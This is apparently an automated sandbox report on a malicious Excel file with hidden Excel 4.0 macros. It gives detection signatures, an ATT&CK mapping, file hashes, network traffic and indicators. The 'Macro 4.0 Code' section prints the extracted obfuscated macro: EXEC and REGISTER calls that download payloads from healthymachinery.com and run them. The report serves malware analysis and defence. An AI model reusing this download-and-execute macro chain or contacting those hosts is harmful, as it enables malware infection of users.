Analysis Report Document1094680387_02012021.xls
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth | |
| JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security | |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team |
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for domain / URL |
Source: | Virustotal: |
Source: | Virustotal: |
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | File created: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Window detected: |
Source: | File opened: |
Source: | Process information set: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Yara detected hidden Macro 4.0 in Excel |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 8% | Virustotal | | |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 8% | Virustotal | | |
| 0% | Avira URL Cloud | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
healthymachinery.com | 172.67.149.197 | true | true | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | unknown |
| | false | | high |
| | false | | high |
| | false | | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.67.149.197 | unknown | United States | | 13335 | CLOUDFLARENETUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 356299 |
Start date: | 22.02.2021 |
Start time: | 21:42:12 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 23s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Document1094680387_02012021.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLS@3/8@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
Cookbook Comments: |
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | 20 associated samples | | malicious | | |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4318 |
Entropy (8bit): | 4.978706497143023 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1fiPvJADh/pRscs1szbGD:1j9jhjYjWK/lyH+k0RADh/pmcs1sfGD |
MD5: | 2885250688BD4C1C1BB0ABE37E258DDC |
SHA1: | A0C1355880E29CA2B53A875CB3C296FA6E7EA829 |
SHA-256: | BE620E05FC49EFF7529785A5D8B96E40B9F1668BBC80B7C33EC46453DEBB3AE4 |
SHA-512: | BD118277C49F05C733EEBD7F674877749639EC64D9C55ADAA72E3DDFB669EECF83F8D9238C53F7C92FF9702D5C8218F3799335E6FBDE36BE964B0AA243E97364 |
Malicious: | false |
Reputation: | low |
IE Cache URL: | http://healthymachinery.com/health/32-422-76.assp |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 26497 |
Entropy (8bit): | 7.568364582865906 |
Encrypted: | false |
SSDEEP: | 384:1nnowDuBP+y+mjZ0VTquDznB3dPjZ8aoVT0QNuzWKPqGndVVBdd:1nnlDuBP+Tmje3nXPj6W+u7qkPLdd |
MD5: | F3B6E4C5C9FA1158B6FAC9252C28F970 |
SHA1: | 0EF9E1DCD12EE01EB92F610564D8AEB7F1F67A98 |
SHA-256: | 569F33677C782BF3A4C8421D4F3C6A76BEEBB41DD2FD3D845C37193758254461 |
SHA-512: | D3C42FBAEBE32348686ADFCCA0E00E3EC2F3977DCAA0C74BAE0200A835993113D0112B017CACECBD884B4B4FD542257144F26C06D679A3E8514B7C641940B7AE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.468842484038273 |
Encrypted: | false |
SSDEEP: | 12:85Qc0LgXg/XAlCPCHaXgzB8IB/iGkZX+Wnicvb4AubDtZ3YilMMEpxRljKXlcTdK:85Zi/XTwz6IAjYekAiDv3qPrNru/ |
MD5: | E382379E6F8EC21891A4C09FC78B2C33 |
SHA1: | 81B9B99F3BF9B4519E6ED6013413BF3327D48BF3 |
SHA-256: | 657B78085B6180BD0BADC5FF6667219E2DF14FC6FC2FA0A0A4F1F550AF56C650 |
SHA-512: | 53FD2827C93CB851ED840261AE22E4BEEC4D398B091B823C95D7F8EF092FCFD3998612EB1866F694502555110424FF591234D659DF437E9DB1A3EFB1521872A0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2198 |
Entropy (8bit): | 4.500480590351624 |
Encrypted: | false |
SSDEEP: | 24:8HYn/XTwz6I4U8WcqFekAxqZDv3qPdM7dD2HYn/XTwz6I4U8WcqFekAxqZDv3qPg:8M/XT3Ing+YJPQh2M/XT3Ing+YJPQ/ |
MD5: | 401E0C09D6A3D5BFFF6B567EC7699127 |
SHA1: | 2D7471A620659CF28658DD30702654F86E33A703 |
SHA-256: | BB865549E2FD35FE53C099CBFF8746859936D9F6706558D4860DAA8B0D134E19 |
SHA-512: | 0018087D2F3EAF6D42CE5E01C82F38AE074D4D6FB6F0E2CAB1AAC6B23E153474C42F2A669F8AC6897DA8679A6290202F39F65D70584CE860084F868DD9561772 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134 |
Entropy (8bit): | 4.703385008978903 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMUdRRMJ9+XVEAl5S/dRRMJ9+XVEAlmMUdRRMJ9+XVEAlv:dj6zJVArS6JVAxzJVA1 |
MD5: | 5DBCC3E3BA539EAC9E456E71F44E7F4C |
SHA1: | 26A9F73B250A22119F585C58096C6DC174B354BD |
SHA-256: | 05CEF3F9B120D1E67A3F7A67F8578A2EE56E1060EAC5FFDF8F572BB4834127B7 |
SHA-512: | 48814DA9A0B6A1A2EFEF65B0FA6617508E2514227CC48B215F3716412375C072A8FD97C3A9EC54463E3A4DAAE0CA9BC26D4D5686D5DEED9F6CAF12B63F7D54C4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 122 |
Entropy (8bit): | 4.5618514532497425 |
Encrypted: | false |
SSDEEP: | 3:GmM/5DyQiqWyD0XQvHU8VXT7OHHRESNSRcuRYigjmXReWpD:XM/5DD1D3JuHS3cuKjmUWpD |
MD5: | D84B2823208AF224D4942EC7FD77CBBF |
SHA1: | 8D9C717B32324F197502E20EFBB1C3763DADF579 |
SHA-256: | DECCE67F750C39C9B6D2E721D97DA196327CF7DFA3EFF790508D756D969F7739 |
SHA-512: | 51CA3F9B77C8B41E2EAAACCE191D11AA08663F7C208A56B55D998FCA9B9B4BD28C457F9BEBD6112272D17A9682C8C19A2257E3E3646613B1912333D88FA6BBEB |
Malicious: | false |
Reputation: | low |
IE Cache URL: | healthymachinery.com/ |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 69069 |
Entropy (8bit): | 6.230482106115366 |
Encrypted: | false |
SSDEEP: | 1536:nZ8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdEfq6PkHZ8rmjAItyzElBIL6lECbgT:nZ8rmjAItyzElBIL6lECbgBGGP5xLm7W |
MD5: | 7C0537F4EBF1358F614989AABC178980 |
SHA1: | 0376B456E68893C84F61273EF06BC7D12FE22ED8 |
SHA-256: | 0DB14CEF15D668DC42C8AD731EB42B0CDCB21E33D3D3C1AFA9010805EB725F9A |
SHA-512: | 38D05E80CCDA7B63F291E068291430D9F9B2E0EDDD440ACD0C9E461A88E10BE894C17E786EC793CE2113BCA9778E6B26F0BAD2C59E9D826C6A354483AF823F4C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4318 |
Entropy (8bit): | 4.978706497143023 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1fiPvJADh/pRscs1szbGD:1j9jhjYjWK/lyH+k0RADh/pmcs1sfGD |
MD5: | 2885250688BD4C1C1BB0ABE37E258DDC |
SHA1: | A0C1355880E29CA2B53A875CB3C296FA6E7EA829 |
SHA-256: | BE620E05FC49EFF7529785A5D8B96E40B9F1668BBC80B7C33EC46453DEBB3AE4 |
SHA-512: | BD118277C49F05C733EEBD7F674877749639EC64D9C55ADAA72E3DDFB669EECF83F8D9238C53F7C92FF9702D5C8218F3799335E6FBDE36BE964B0AA243E97364 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.9082210251254503 |
TrID: |
|
File name: | Document1094680387_02012021.xls |
File size: | 64512 |
MD5: | 9423ee9775707d51960e0eac95b3f6cc |
SHA1: | debc0defc997fde77a2f0cee9b3b1fcbed54ea91 |
SHA256: | 7034e21128da9ce58c2d5249d3fd73dd766cf90437fa52f79faa50098f359634 |
SHA512: | 0cff3519c5453bdeb13201849c571cbb142ed6780c2e6cae572104904af1190ff4d4e068ff0109953745b153fc219c618519318cadd4dcac300b3d280643bc53 |
SSDEEP: | 1536:TcPiTQAVW/89BQnmlcGvgZ6GrvhpJ8YUOMUt/BI/s/Vk/OZ/R/7/Gm/UQ/OhGW/x:TcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOA |
File Content Preview: | ........................>.......................|...........................{.................................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "Document1094680387_02012021.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-01 14:40:50 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.292801571342 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . B a s e . . . . . K l o p s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 70 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.271885406754 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 54588 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 54588 |
Entropy: | 4.12824675227 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . Y u Z h o u L e e B . . . . . . . . . . . . . . . . . . . . . . . K l o p s . . . . . . . . . . . . . . . . . . N i o k a s e r . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0b 59 75 20 5a 68 6f 75 20 4c 65 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
Extracted macro cells (non-empty, in order): |
=EXEC("r"&Base!V56&" "&Base!V55&",D"&Base!V57)
=REGISTER(Base!W51&Base!W52&Base!W53&Base!W54&Base!W55&Base!W56,Base!X50&Base!X51&Base!X52&Base!X53&Base!X54&Base!X55&Base!X56&Base!X57&Base!X58&Base!X59&Base!X60&Base!X61&Base!X62&Base!X63&Base!X64&Base!X65&Base!X66&Base!X67,Base!W59&Base!W60&Base!W61&Base!W62&Base!W63&Base!W64,Base!W66,,1,9)
=C153()
=Niokaser(0,"h"&Base!V54&C166&B170,Base!V55,0,0)
=Niokaser(0,Base!V54&C167&B170,Base!V55&"1",0,0)
=Niokaser(0,Base!V54&C168&B170,Base!V55&"2",0,0)
=Niokaser(0,Base!V54&C169&B170,Base!V55&"3",0,0)
=Niokaser(0,Base!V54&C170&B170,Base!V55&"4",0,0)
=HALT()
=GOTO(D153)
=GOTO(B153)
healthymachinery.com/health/32-422-76.assp
healthymachinery.com/health/56754.fdre
healthymachinery.com/health/56754.fdre
healthymachinery.com/health/56754.fdre
healthymachinery.com/health/56754.fdre
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 22, 2021 21:43:00.961786985 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:43:01.016254902 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.016521931 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:43:01.017865896 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:43:01.071145058 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.097974062 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.098009109 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.098030090 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.098244905 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:45:00.816421986 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:45:00.870547056 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:45:00.870827913 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 22, 2021 21:43:00.876825094 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 22, 2021 21:43:00.938873053 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 22, 2021 21:43:00.876825094 CET | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 22, 2021 21:43:00.938873053 CET | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | | | 172.67.149.197 | A (IP address) | IN (0x0001) |
Feb 22, 2021 21:43:00.938873053 CET | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | | | 104.21.29.200 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 172.67.149.197 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 22, 2021 21:43:01.017865896 CET | 0 | OUT | |
Feb 22, 2021 21:43:01.097974062 CET | 2 | IN |